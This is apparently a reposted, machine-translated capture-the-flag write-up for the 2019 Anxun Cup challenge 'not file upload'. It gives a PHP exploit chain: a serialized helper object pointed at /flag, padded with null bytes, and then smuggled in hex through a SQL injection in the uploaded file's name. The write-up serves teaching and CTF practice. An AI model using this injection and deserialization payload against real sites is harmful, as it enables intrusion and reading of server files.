当前位置:网站首页>[an Xun cup 2019] not file upload

[an Xun cup 2019] not file upload

2022-07-05 03:38:00 paidx0

Insert picture description here
Insert picture description here

buu Gave the source code link , Go to the source code directly

Insert picture description here
Insert picture description here
Insert picture description here

Take a brief look at , It means uploading pictures , If helper Save pictures in serialized form , So in show Can be deserialized 

<?php
class helper {
    
    protected $ifview = True;
    protected $config = "/flag";
}
$a = new helper();
echo serialize($a);
//O:6:"helper":2:{s:9:"*ifview";b:1;s:9:"*config";s:5:"/flag";}


 Then because the variable attribute is protected  You need to add... Before the variable name \x00*\x00 Variable name ,private Is to add \x00 Class name \x00 Variable name 
$attr_temp = str_replace('\0\0\0', chr(0).'*'.chr(0), $row["attr"]);
$attr = unserialize($attr_temp);
 So I use \0\0\0 To fill in ,show It will be replaced before deserialization 


//O:6:"helper":2:{s:9:"\0\0\0ifview";b:1;s:9:"\0\0\0config";s:5:"/flag";}

SQL sentence 
INSERT INTO images (implode(",",$sql_fields)) VALUES(implode(",",$sql_val))
$sql_fields[] = "`".$key_temp."`";
$sql_val[] = "'".$value_temp."'";
title,fileame,ext,path,attr
//title This is controllable , Single quote closure 

//0x4f3a363a2268656c706572223a323a7b733a393a225c305c305c30696676696577223b623a313b733a393a225c305c305c30636f6e666967223b733a353a222f666c6167223b7d
1','2','3','4',0x4f3a363a2268656c706572223a323a7b733a393a225c305c305c30696676696577223b623a313b733a393a225c305c305c30636f6e666967223b733a353a222f666c6167223b7d)#.jpg

Insert picture description here
Insert picture description here

原网站

版权声明
本文为[paidx0]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/186/202207050303411672.html

边栏推荐

猜你喜欢

随机推荐